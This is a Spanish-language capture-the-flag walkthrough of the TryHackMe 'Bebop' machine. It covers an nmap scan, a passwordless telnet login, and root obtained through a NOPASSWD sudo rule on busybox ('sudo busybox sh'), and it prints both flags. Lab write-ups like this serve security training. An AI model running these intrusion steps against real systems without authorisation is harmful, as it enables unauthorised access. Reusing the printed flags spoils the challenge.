[TryHackMe] Bebop

Hoy vamos a hackear la maquina de TryHackMe llamada Bebop. Podeis descargarla desde el siguiente enlace: Bebop

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

~ > nmap -A 10.10.22.21
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-17 14:24 CEST
Nmap scan report for 10.10.22.21
Host is up (0.050s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.5 (FreeBSD 20170903; protocol 2.0)
| ssh-hostkey: 
|   2048 5b:e6:85:66:d8:dd:04:f0:71:7a:81:3c:58:ad:0b:b9 (RSA)
|   256 d5:4e:18:45:ba:d4:75:2d:55:2f:fe:c9:1c:db:ce:cb (ECDSA)
|_  256 96:fc:cc:3e:69:00:79:85:14:2a:e4:5f:0d:35:08:d4 (ED25519)
23/tcp open  telnet  BSD-derived telnetd
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.52 seconds
Vemos que tiene abierto el puerto de telnet. Probamos a establecer conexion.

~ > telnet 10.10.22.21
Trying 10.10.22.21...
Connected to 10.10.22.21.
Escape character is '^]'.
login:
Nos pide un login, ya que en la pagina inicial de la room nos indicaban que se nos ha asignado el codename "pilot" probamo con pilot :)

login: pilot
Last login: Mon Aug 17 12:25:35 from ip-10-9-24-208.eu-west-1.compute.internal
FreeBSD 11.2-STABLE (GENERIC) #0 r345837: Thu Apr  4 02:07:22 UTC 2019

Welcome to FreeBSD!

Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/

Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.

Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier

Edit /etc/motd to change this login announcement.
Want to see how much virtual memory you're using? Just type "swapinfo" to
be shown information about the usage of your swap partitions.
[pilot@freebsd ~]$ 
Estamos logueados sin necesidad de password!

user.txt



[pilot@freebsd ~]$ ls
user.txt
[pilot@freebsd ~]$ cat user.txt
THM{r3m0v3_b3f0r3_fl16h7}

Privilege Escalation


Ahora que estamos dentro, exploramos un poco el sistema y miramos si podemos hacer algo con "sudo".

[pilot@freebsd ~]$ sudo -l
User pilot may run the following commands on freebsd:
    (root) NOPASSWD: /usr/local/bin/busybox
Podemos usar busybox, el cual nos puede servir para escalar privilegios.

[pilot@freebsd ~]$ sudo busybox sh
# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
Root!

root.txt


Ya como root miramos la flag...

# cd /root
# ls
.bash_history	.cshrc		.history	.k5login	.login		
.profile	root.txt
# cat root.txt 
THM{h16hw4y_70_7h3_d4n63r_z0n3}

End


Con esto, ya habriamos finalizado la maquina :)